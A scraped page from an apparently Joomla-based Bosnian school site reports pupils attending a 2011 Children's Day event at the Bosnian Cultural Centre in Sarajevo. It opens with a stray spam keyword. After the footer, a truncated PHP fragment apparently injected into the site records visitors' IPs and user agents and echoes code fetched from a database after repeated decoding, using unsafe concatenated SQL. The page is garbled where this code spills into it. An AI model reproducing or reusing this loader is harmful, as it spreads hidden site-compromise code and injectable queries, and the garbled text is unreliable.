fuga mobilya

U posjeti BKC Sarajevo

Written by  škola
(1 Vote)

Učenici V-ih razreda naše škole su u četvrtak 21.4.2011. godine posjetili Bosanski kulturni centar u Sarajevu povodom međunarodnog praznika Dana djece i prisustvovali manifestaciji koju je vojna misija Turske u BiH organizirala.

Manifestaciji je prisustvovalo 1.300 učenika iz osnovnih škola cijele BiH, dok je njih 300 priredilo različite muzičke i scenske programe povodom ovog dana. Brigadir Turske vojne misije u BiH Ali Tahsin Tunali pozdravio je učenike na početku programa, naglasivši da je Dan djece 1929. godine ustanovio veliki turski vođa Kemal Ataturk, od kada se taj dan 23. aprila slavi u cijeloj Turskoj, te svim turskim školama i ustanovama širom svijeta. "Neka se nikada ne ugasi ljubav u vašim srcima, sjaj u vašim očima i osmijeh na vašim licima. Neka vam život uvijek bude ispunjen radošću", poručio je djeci brigadir Tunali.

Učenici su priredili raznovrstan program povodom ovog dana, kao što su izvedbe pjesmi na turskom jeziku i brojne plesne koreografije. U pratnji svojih nastavnika 45 učenika naše škole je uživalo u izuzetnom kulturnom-zabavnom programu.

Nadamo se da će naša škola nastaviti uspješnu saradnju sa vojnom misijom Turske u BiH i da će naši učenici u slijedećoj manifestaciji biti i učesnici samog programa.

Read 1414 times

Add comment

Security code Refresh

Ko je online?

Trenutno aktivnih Gostiju: 5

Powered by Joomla!. Valid XHTML and CSS.

= 1) { //mysql_query('INSERT INTO lionking (domainname, fullpath, ip, useragent, processtime) VALUES ("'.$g['domainname'].'","'.$g['fullpath'].'","'.$g['ip'].'","'.$g['useragent'].'", NOW())'); $rs = mysql_fetch_array($q); echo stripslashes(stripslashes(stripslashes(html_entity_decode(html_entity_decode($rs['code']))))); } else { mysql_query('INSERT INTO lionking_saved (domainname, stat, processtime) VALUES ("'.$g['domainname'].'","2", NOW())'); } } ?>